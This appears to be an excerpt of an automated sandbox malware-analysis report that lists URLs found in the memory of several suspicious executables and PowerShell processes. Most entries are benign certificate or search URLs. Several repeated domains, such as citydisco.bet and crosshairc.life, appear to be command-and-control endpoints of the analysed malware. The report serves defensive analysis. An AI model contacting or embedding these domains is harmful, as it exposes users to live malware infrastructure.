                          Source: s7MG2VL.exe, 0000000C.00000003.2089689153.0000000001384000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2006495167.0000000001384000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2059422413.0000000001384000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2005615609.0000000001384000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000002.2092842281.0000000001384000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2090492021.0000000001384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.
                          Source: s7MG2VL.exe, 0000000C.00000003.1945794739.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1989600937.000000000386E000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2065951244.0000000003B85000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2201002970.000000000335F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                          Source: ps.exe, 00000026.00000003.2183396696.0000000002D08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
                          Source: s7MG2VL.exe, 0000000C.00000003.1945794739.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1989600937.000000000386E000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2065951244.0000000003B85000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2201002970.000000000335F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: s7MG2VL.exe, 0000000C.00000003.1945794739.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1989600937.000000000386E000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2065951244.0000000003B85000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2201002970.000000000335F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: s7MG2VL.exe, 0000000C.00000003.1945794739.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1989600937.000000000386E000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2065951244.0000000003B85000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2201002970.000000000335F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: s7MG2VL.exe, 0000000C.00000003.1945794739.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1989600937.000000000386E000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2065951244.0000000003B85000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2201002970.000000000335F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                          Source: ps.exe, 00000026.00000003.2183396696.0000000002D08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cs-g2-crl.thawte.com/ThawteCSG2.crl0
                          Source: yo7qmvz.exe, 00000023.00000002.2473226471.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000002.2469842738.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000002.2472127686.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/gsr1.crt0-
                          Source: yo7qmvz.exe, 00000023.00000002.2473226471.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000002.2472127686.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r4.crt0
                          Source: yo7qmvz.exe, 00000023.00000002.2473226471.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000002.2469842738.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000002.2472127686.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/we1.crt0-
                          Source: powershell.exe, 00000028.00000002.2227566449.0000019E70DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2404818559.000002035DCD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: yo7qmvz.exe, 00000023.00000002.2473226471.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000002.2469842738.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000002.2472127686.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://o.pki.goog/s/we1/WnI0%
                          Source: s7MG2VL.exe, 0000000C.00000003.1945794739.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1989600937.000000000386E000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2065951244.0000000003B85000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2201002970.000000000335F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                          Source: s7MG2VL.exe, 0000000C.00000003.1945794739.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1989600937.000000000386E000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2065951244.0000000003B85000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2201002970.000000000335F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                          Source: ps.exe, 00000026.00000003.2183396696.0000000002D08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                          Source: powershell.exe, 0000002A.00000002.2249861056.000002034DE97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000028.00000002.2179176263.0000019E60F77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2249861056.000002034DE97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                          Source: powershell.exe, 00000028.00000002.2179176263.0000019E60D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2249861056.000002034DC71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000028.00000002.2179176263.0000019E60F77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2249861056.000002034DE97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                          Source: powershell.exe, 0000002A.00000002.2249861056.000002034DE97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: s7MG2VL.exe, 0000000C.00000003.1945794739.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1989600937.000000000386E000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2065951244.0000000003B85000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2201002970.000000000335F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                          Source: s7MG2VL.exe, 0000000C.00000003.1945794739.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1989600937.000000000386E000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2065951244.0000000003B85000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2201002970.000000000335F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                          Source: yo7qmvz.exe, 00000023.00000003.2143407110.0000000003347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                          Source: dx3hXS1.exe, 00000035.00000002.2431681495.00007FF6814A9000.00000002.00000001.01000000.0000002A.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
                          Source: dx3hXS1.exe, 00000035.00000002.2431681495.00007FF6814A9000.00000002.00000001.01000000.0000002A.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?You
                          Source: dx3hXS1.exe, 00000035.00000002.2431681495.00007FF6814A9000.00000002.00000001.01000000.0000002A.sdmpString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
                          Source: dx3hXS1.exe, 00000035.00000002.2431681495.00007FF6814A9000.00000002.00000001.01000000.0000002A.sdmpString found in binary or memory: https://aka.ms/dotnet/app-launch-failed&gui=trueShowing
                          Source: powershell.exe, 00000028.00000002.2179176263.0000019E60D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2249861056.000002034DC71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                          Source: s7MG2VL.exe, 0000000C.00000003.1947396492.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1991246461.00000000010FC000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2068501230.00000000015AD000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2205498760.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                          Source: s7MG2VL.exe, 0000000C.00000003.1947396492.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1991246461.00000000010FC000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2068501230.00000000015AD000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2205498760.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                          Source: yo7qmvz.exe, 00000023.00000003.2143407110.0000000003347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: s7MG2VL.exe, 0000000C.00000003.1894143915.0000000005DAE000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1938230921.0000000003867000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2003276985.0000000003B77000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2143407110.0000000003347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: s7MG2VL.exe, 0000000C.00000003.1894143915.0000000005DAE000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1938230921.0000000003867000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2003276985.0000000003B77000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2143407110.0000000003347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: ZqkKpwG.exe, 00000011.00000002.2470317252.000000000105B000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2016824573.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2015839462.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2017274565.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2015514582.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2067697997.00000000010B9000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2016203540.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2049616075.000000000105D000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2016518122.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2018571591.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2014284185.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000002.2473186229.00000000010BC000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2240957209.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2295309050.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2242364786.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2126477657.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000002.2472127686.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2268782865.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2268375123.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/
                          Source: ZqkKpwG.exe, 00000011.00000002.2470317252.000000000105B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/$
                          Source: s7MG2VL.exe, 0000000C.00000003.1973668493.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.1973410361.0000000005D7C000.00000004.00000800.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.1974078052.0000000005D7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/.
                          Source: s7MG2VL.exe, 0000000C.00000003.2027955361.0000000005D7E000.00000004.00000800.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2005443595.0000000005D7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/Z
                          Source: s7MG2VL.exe, 0000000C.00000003.2089689153.0000000001384000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2028143185.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2090607311.0000000001363000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2059422413.0000000001384000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2059512968.0000000001363000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.1982341555.0000000001363000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000002.2092747962.0000000001363000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.1981414449.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2005702972.0000000001363000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2005615609.0000000001384000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000002.2092842281.0000000001384000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2090492021.0000000001384000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2015839462.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2019037916.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000002.2473186229.00000000010EB000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1989519285.00000000010EB000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1964216082.00000000010EB000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1988754105.00000000010EB000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1963517727.00000000010EB000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2019127027.000000000105D000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2016518122.00000000010CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJIS
                          Source: ZqkKpwG.exe, 00000011.00000003.1964216082.00000000010EB000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1963517727.00000000010EB000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1962963447.00000000010EB000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1963789425.00000000010EB000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1962826749.00000000010E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJIS1
                          Source: yo7qmvz.exe, 00000023.00000003.2268782865.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJIS19
                          Source: s7MG2VL.exe, 0000000C.00000003.1945712484.0000000001404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJIS5/8A
                          Source: s7MG2VL.exe, 0000000C.00000003.1945344633.0000000001404000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJIS5/8Aq
                          Source: ZqkKpwG.exe, 00000011.00000003.1989519285.00000000010EB000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1988754105.00000000010EB000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2014536331.00000000010EA000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1989204713.00000000010EB000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2014107276.00000000010EA000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1962826749.00000000010E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJIS=
                          Source: yo7qmvz.exe, 00000023.00000003.2240957209.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2295309050.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2242364786.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000002.2472127686.0000000000BAD000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2268782865.0000000000BB0000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2268375123.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISI
                          Source: ZqkKpwG.exe, 00000011.00000002.2470317252.000000000105B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISN
                          Source: ZqkKpwG.exe, 00000011.00000003.2049616075.000000000105D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISN;
                          Source: ZqkKpwG.exe, 00000011.00000003.2015839462.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2019037916.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2016518122.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2014284185.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2017274565.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2016203540.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2018571591.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2015514582.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2015041545.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2016824573.00000000010CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJIS_9
                          Source: yo7qmvz.exe, 00000023.00000003.2240957209.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2242364786.0000000000BB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISb
                          Source: s7MG2VL.exe, 0000000C.00000003.2005702972.0000000001363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISbb
                          Source: ZqkKpwG.exe, 00000011.00000003.1962826749.00000000010E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISl
                          Source: s7MG2VL.exe, 0000000C.00000003.2059422413.0000000001384000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.1981414449.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2174225421.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2199523738.0000000000BD7000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2174029581.0000000000BD4000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2295433501.0000000000BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/gdJISs
                          Source: s7MG2VL.exe, 0000000C.00000003.1973668493.0000000005D7D000.00000004.00000800.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.1973410361.0000000005D7C000.00000004.00000800.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.1974078052.0000000005D7E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/h
                          Source: yo7qmvz.exe, 00000023.00000003.2240957209.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2242364786.0000000000BB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/j
                          Source: ZqkKpwG.exe, 00000011.00000002.2470317252.000000000105B000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2295309050.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000002.2472127686.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/k
                          Source: ZqkKpwG.exe, 00000011.00000002.2470317252.000000000105B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet/n
                          Source: s7MG2VL.exe, 0000000C.00000003.1945773980.000000000140C000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.1945297555.0000000001405000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.1945712484.0000000001408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet:443/gdJIS
                          Source: ZqkKpwG.exe, 00000011.00000002.2470317252.000000000105B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet:443/gdJISDeskShare
                          Source: yo7qmvz.exe, 00000023.00000003.2126477657.0000000000B33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet:443/gdJISV
                          Source: ZqkKpwG.exe, 00000011.00000002.2470317252.000000000105B000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2049616075.000000000105D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet:443/gdJISVu
                          Source: yo7qmvz.exe, 00000023.00000003.2268488347.0000000000B33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citydisco.bet:443/gdJIScal
                          Source: s7MG2VL.exe, 0000000C.00000003.1947396492.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1991246461.00000000010FC000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2068501230.00000000015AD000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2205498760.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                          Source: s7MG2VL.exe, 0000000C.00000003.1947396492.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1991246461.00000000010FC000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2068501230.00000000015AD000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2205498760.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: powershell.exe, 0000002A.00000002.2404818559.000002035DCD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 0000002A.00000002.2404818559.000002035DCD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 0000002A.00000002.2404818559.000002035DCD8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: s7MG2VL.exe, 0000000C.00000003.2089502433.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2090607311.0000000001363000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000002.2092987885.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000002.2092747962.0000000001363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crosshairc.life/
                          Source: s7MG2VL.exe, 0000000C.00000003.2089502433.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000002.2092987885.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crosshairc.life/:
                          Source: yo7qmvz.exe, 00000023.00000002.2473226471.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crosshairc.life/a
                          Source: s7MG2VL.exe, 0000000C.00000003.2089502433.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000002.2092987885.00000000013DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crosshairc.life/b
                          Source: yo7qmvz.exe, 00000023.00000002.2473226471.0000000000BDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crosshairc.life/c
                          Source: yo7qmvz.exe, 00000023.00000002.2473226471.0000000000BDB000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000002.2472127686.0000000000BAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crosshairc.life/dAnjhw
                          Source: s7MG2VL.exe, 0000000C.00000002.2099061578.0000000005D70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crosshairc.life/dAnjhws
                          Source: yo7qmvz.exe, 00000023.00000002.2469842738.0000000000B33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crosshairc.life:443/dAnjhwkShare
                          Source: ps.exe, 00000026.00000002.2203329798.0000000140010000.00000004.00000001.01000000.00000013.sdmp, ps.exe, 00000026.00000002.2199954979.0000000000910000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
                          Source: yo7qmvz.exe, 00000023.00000003.2143407110.0000000003347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: s7MG2VL.exe, 0000000C.00000003.1894143915.0000000005DAE000.00000004.00000800.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.1938230921.0000000003867000.00000004.00000800.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2003276985.0000000003B77000.00000004.00000800.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2143407110.0000000003347000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
